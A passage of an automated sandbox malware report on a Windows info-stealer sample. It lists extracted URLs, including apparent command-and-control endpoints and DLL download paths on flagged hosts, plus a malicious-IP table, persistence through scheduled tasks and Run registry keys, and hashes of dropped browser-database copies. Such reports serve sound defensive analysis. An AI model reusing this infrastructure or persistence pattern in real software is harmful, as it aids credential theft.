                                                                                                                                                      https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2504860835.000000000BFC3000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2164670345.0000000005A97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        https://cheapptaxysu.click:443/apihl5813f66ed1.exe, 0000000C.00000003.2235833487.0000000001187000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          http://ocsp.rootca1.amazontrust.com0:5813f66ed1.exe, 0000000C.00000003.2162768069.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20163m20j.exe, 0000000A.00000003.2186629951.0000000005E8D000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2486440512.0000000000D24000.00000040.00000001.01000000.0000000D.sdmp, 5813f66ed1.exe, 0000000C.00000003.2113704300.0000000005B23000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2113307590.0000000005AD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              http://185.215.113.206/c4becf79229cb002.php-3m20j.exe, 0000000A.00000002.2504860835.000000000BFD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                https://curl.se/docs/alt-svc.html941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  https://www.ecosia.org/newtab/3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104357704.0000000005ACB000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104619063.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br5813f66ed1.exe, 0000000C.00000003.2164097213.000000000603C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      http://185.215.113.206/68b591d6548ec281/freebl3.dllw3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        http://home.fivetk5vt.top/hLfzXsaqNtoEGyaUtOMJ17941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                          http://www.carterandcone.comlfc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://www.cloudflare.com/5xx-error-landing5813f66ed1.exe, 0000000C.00000003.2065972108.0000000001126000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2065900770.0000000001169000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://185.215.113.206/c4becf79229cb002.php;3m20j.exe, 0000000A.00000002.2504860835.000000000BFD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://www.fontbureau.com/designers/frere-user.htmlfc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://httpbin.org/ipbefore941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                    http://185.215.113.206/68b591d6548ec281/nss3.dll;3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      http://crl.micro2i7672.exe, 00000005.00000003.1961167556.0000000000880000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000003.1960896276.0000000000872000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxexsvchost.exe, 00000014.00000002.2371127771.0000000002ADC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                          https://support.microsof5813f66ed1.exe, 0000000C.00000003.2113307590.0000000005B25000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            http://185.215.113.206/68b591d6548ec281/freebl3.dlli3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              http://185.215.113.206F93m20j.exe, 0000000A.00000002.2492560230.00000000017CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples5813f66ed1.exe, 0000000C.00000003.2113307590.0000000005AB2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  http://185.215.113.206/c4becf79229cb002.phpS3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    https://grannyejh.lat/XA2i7672.exe, 00000005.00000003.1961193067.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000002.1961816047.0000000000830000.00000004.00000020.00020000.00000000.sdmp, 2i7672.exe, 00000005.00000003.1961343768.000000000082F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      https://sci.libertyreserve.com/fc1570cd0d.exe, 00000011.00000002.2295811888.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000011.00000000.2223737952.0000000000732000.00000002.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                                                        http://185.215.113.206/c4becf79229cb002.phpQ3m20j.exe, 0000000A.00000002.2504860835.000000000BFD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxesvchost.exe, 00000014.00000002.2371127771.0000000002ADC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            http://html4/loose.dtd941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF3m20j.exe, 0000000A.00000003.2333057472.000000000C0DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                http://www.fontbureau.com/designersGfc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  https://cheapptaxysu.click/api_&5813f66ed1.exe, 0000000C.00000003.2190681116.0000000001122000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    http://www.fontbureau.com/designers/?fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      http://www.founder.com.cn/cn/bThefc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        https://github.com/mgravell/protobuf-netJfc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.0000000003881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.000000000394D000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2319337155.00000000051C0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                          http://www.fontbureau.com/designers?fc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            http://www.tiro.comfc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=3m20j.exe, 0000000A.00000002.2492560230.0000000001883000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104357704.0000000005ACB000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2104619063.0000000005AC9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                https://api.libertyreserve.com/beta/xml/history.aspxSfc1570cd0d.exe, 00000011.00000002.2295811888.0000000002B71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                  https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e173m20j.exe, 0000000A.00000003.2186629951.0000000005E8D000.00000004.00000020.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2486440512.0000000000D24000.00000040.00000001.01000000.0000000D.sdmp, 5813f66ed1.exe, 0000000C.00000003.2113704300.0000000005B23000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2113307590.0000000005AD7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                    http://www.goodfont.co.krfc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                      http://.css941d08ea4f.exe, 00000010.00000003.2162777635.000000000738F000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        http://www.typography.netDfc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          http://185.215.113.206/c4becf79229cb002.phpy3m20j.exe, 0000000A.00000002.2504860835.000000000BFD9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            http://www.galapagosdesign.com/staff/dennis.htmfc1570cd0d.exe, 00000011.00000002.2311663356.0000000009222000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              https://github.com/mgravell/protobuf-netifc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.0000000003881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.000000000394D000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2319337155.00000000051C0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                                https://cheapptaxysu.click:443/api5813f66ed1.exe, 5813f66ed1.exe, 0000000C.00000003.2162532914.0000000005A9A000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2162142296.0000000005A97000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  http://185.215.113.206/Z3m20j.exe, 0000000A.00000002.2492560230.000000000182C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    http://x1.c.lencr.org/05813f66ed1.exe, 0000000C.00000003.2162768069.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      http://x1.i.lencr.org/05813f66ed1.exe, 0000000C.00000003.2162768069.0000000005AA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        https://stackoverflow.com/q/11564914/23354;fc1570cd0d.exe, 00000012.00000002.2310077330.0000000002881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.0000000003881000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2314934318.000000000394D000.00000004.00000800.00020000.00000000.sdmp, fc1570cd0d.exe, 00000012.00000002.2319337155.00000000051C0000.00000004.08000000.00040000.00000000.sdmpfalse

                                                                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                          185.215.113.43
                                                                                                                                                                                                                                                          		unknownPortugal
                                                                                                                                                                                                                                                          		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                          172.217.19.228
                                                                                                                                                                                                                                                          		www.google.comUnited States
                                                                                                                                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                          98.85.100.80
                                                                                                                                                                                                                                                          		httpbin.orgUnited States
                                                                                                                                                                                                                                                          		11351TWC-11351-NORTHEASTUSfalse
                                                                                                                                                                                                                                                          104.21.66.85
                                                                                                                                                                                                                                                          		aspecteirs.latUnited States
                                                                                                                                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                          104.21.64.80
                                                                                                                                                                                                                                                          		grannyejh.latUnited States
                                                                                                                                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                          185.215.113.16
                                                                                                                                                                                                                                                          		unknownPortugal
                                                                                                                                                                                                                                                          		206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                                                          20.233.83.145
                                                                                                                                                                                                                                                          		github.comUnited States
                                                                                                                                                                                                                                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                          142.250.181.132
                                                                                                                                                                                                                                                          		unknownUnited States
                                                                                                                                                                                                                                                          		15169GOOGLEUSfalse
                                                                                                                                                                                                                                                          239.255.255.250
                                                                                                                                                                                                                                                          		unknownReserved
                                                                                                                                                                                                                                                          		unknownunknownfalse
                                                                                                                                                                                                                                                          176.53.146.212
                                                                                                                                                                                                                                                          		home.fivetk5vt.topUnited Kingdom
                                                                                                                                                                                                                                                          		35791VANNINVENTURESGBtrue
                                                                                                                                                                                                                                                          185.215.113.206
                                                                                                                                                                                                                                                          		unknownPortugal
                                                                                                                                                                                                                                                          		206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                          185.199.108.133
                                                                                                                                                                                                                                                          		raw.githubusercontent.comNetherlands
                                                                                                                                                                                                                                                          		54113FASTLYUSfalse
                                                                                                                                                                                                                                                          104.21.67.146
                                                                                                                                                                                                                                                          		cheapptaxysu.clickUnited States
                                                                                                                                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                                                          31.41.244.11
                                                                                                                                                                                                                                                          		unknownRussian Federation
                                                                                                                                                                                                                                                          		61974AEROEXPRESS-ASRUfalse

                                                                                                                                                                                                                                                          Private

                                                                                                                                                                                                                                                          IP
                                                                                                                                                                                                                                                          192.168.2.4
                                                                                                                                                                                                                                                          127.0.0.1

                                                                                                                                                                                                                                                          General Information

                                                                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                          Analysis ID:1578280
                                                                                                                                                                                                                                                          Start date and time:2024-12-19 14:19:00 +01:00
                                                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                          Overall analysis duration:0h 21m 47s
                                                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                          Number of analysed new started processes analysed:54
                                                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                                                          Sample name:Tii6ue74NB.exe
                                                                                                                                                                                                                                                          (renamed file extension from none to exe, renamed because original name is a hash value)
                                                                                                                                                                                                                                                          Original Sample Name:da05563897f4d6dc3e18c20da49078f103dbeee1c8ba9ddd01e7e7d8b0077fca
                                                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@100/54@28/16
                                                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                                                          • Successful, ratio: 57.1%
                                                                                                                                                                                                                                                          HCA Information:Failed
                                                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                                                                          • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 23.32.238.18, 192.229.221.95, 23.54.80.83, 142.250.181.99, 172.217.17.78, 64.233.164.84, 142.250.181.142, 172.217.17.67, 104.208.16.94, 20.12.23.50, 23.218.208.109, 13.107.246.63, 40.126.53.11, 52.182.143.214
                                                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): prod.detectportal.prod.cloudops.mozgcp.net, slscr.update.microsoft.com, spocs.getpocket.com, incoming.telemetry.mozilla.org, clientservices.googleapis.com, aus5.mozilla.org, contile.services.mozilla.com, prod.content-signature-chains.prod.webservices.mozgcp.net, content-signature-2.cdn.mozilla.net, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, login.live.com, firefox.settings.services.mozilla.com, prod.ads.prod.webservices.mozgcp.net, push.services.mozilla.com, www.gstatic.com, onedsblobprdcus16.centralus.cloudapp.azure.com, prod.classify-client.prod.webservices.mozgcp.net, prod.balrog.prod.cloudops.mozgcp.net, fs.microsoft.com, shavar.prod.mozaws.net, accounts.google.com, otelrules.azureedge.net, self.events.data.microsoft.com, detectportal.firefox.com, ctldl.windowsupdate.com, prod.remote-settings.prod.webservices.mozgcp.net, fe3cr.delivery.mp.microsoft.com, youtube.com, blobcollector.events.data.trafficmanager.net, shavar.services.mozilla.com, um
                                                                                                                                                                                                                                                          • Execution Graph export aborted for target 2i7672.exe, PID 6896 because there are no executed function
                                                                                                                                                                                                                                                          • Execution Graph export aborted for target 3m20j.exe, PID 5932 because there are no executed function
                                                                                                                                                                                                                                                          • Execution Graph export aborted for target 5813f66ed1.exe, PID 5552 because there are no executed function
                                                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                          • VT rate limit hit for: Tii6ue74NB.exe

                                                                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                                                          08:20:13API Interceptor23283972x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                                                                          08:20:15API Interceptor3x Sleep call for process: 2i7672.exe modified
                                                                                                                                                                                                                                                          08:20:30API Interceptor8x Sleep call for process: 5813f66ed1.exe modified
                                                                                                                                                                                                                                                          08:20:47API Interceptor1x Sleep call for process: fc1570cd0d.exe modified
                                                                                                                                                                                                                                                          08:20:51API Interceptor94x Sleep call for process: 3m20j.exe modified
                                                                                                                                                                                                                                                          08:21:03API Interceptor34x Sleep call for process: powershell.exe modified
                                                                                                                                                                                                                                                          08:21:11API Interceptor9x Sleep call for process: 7ab555facf.exe modified
                                                                                                                                                                                                                                                          08:21:11API Interceptor846666x Sleep call for process: 941d08ea4f.exe modified
                                                                                                                                                                                                                                                          08:21:21API Interceptor65x Sleep call for process: 3800cab1bc.exe modified
                                                                                                                                                                                                                                                          08:21:31API Interceptor8x Sleep call for process: d1a239d4e2ee4a8aa1443a088d48cd64.exe modified
                                                                                                                                                                                                                                                          08:23:15API Interceptor1782223x Sleep call for process: service123.exe modified
                                                                                                                                                                                                                                                          08:23:18API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                                          13:20:10Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                          13:22:43Task SchedulerRun new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe
                                                                                                                                                                                                                                                          13:22:50Task SchedulerRun new task: Intel_PTT_EK_Recertification path: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                                                                                                                          13:26:51AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2e5458ffdc.exe C:\Users\user\AppData\Local\Temp\1017631001\2e5458ffdc.exe
                                                                                                                                                                                                                                                          13:26:59AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2fa41e6f08.exe C:\Users\user\AppData\Local\Temp\1017632001\2fa41e6f08.exe
                                                                                                                                                                                                                                                          13:27:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2e5458ffdc.exe C:\Users\user\AppData\Local\Temp\1017631001\2e5458ffdc.exe
                                                                                                                                                                                                                                                          13:27:16AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 2fa41e6f08.exe C:\Users\user\AppData\Local\Temp\1017632001\2fa41e6f08.exe
                                                                                                                                                                                                                                                          13:27:25AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 383bae3e2f.exe C:\Users\user\AppData\Local\Temp\1017633001\383bae3e2f.exe
                                                                                                                                                                                                                                                          13:27:33AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run da0ff4b379.exe C:\Users\user\AppData\Local\Temp\1017634001\da0ff4b379.exe
                                                                                                                                                                                                                                                          13:27:46AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 383bae3e2f.exe C:\Users\user\AppData\Local\Temp\1017633001\383bae3e2f.exe
                                                                                                                                                                                                                                                          13:27:55AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run da0ff4b379.exe C:\Users\user\AppData\Local\Temp\1017634001\da0ff4b379.exe

                                                                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                                                                          IPs

                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                                                                          No context

                                                                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                                                                          C:\ProgramData\CBKFBAEC

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):114688
                                                                                                                                                                                                                                                          Entropy (8bit):0.9746603542602881
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                                                                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                                                                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                                                                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                                                                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\GHJDGDBFCBKFHJKFHCBK

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):40960
                                                                                                                                                                                                                                                          Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\GHJKJDAKEHJDGDGDGHIDAEGIJJ

                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):5242880
                                                                                                                                                                                                                                                          Entropy (8bit):0.037963276276857943
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                                                                                                                                                                                                                                          MD5:C0FDF21AE11A6D1FA1201D502614B622
                                                                                                                                                                                                                                                          SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                                                                                                                                                                                                                                          SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                                                                                                                                                                                                                                          SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                          C:\ProgramData\HDHJEBFBFHJECAKFCAAKEGHDBA

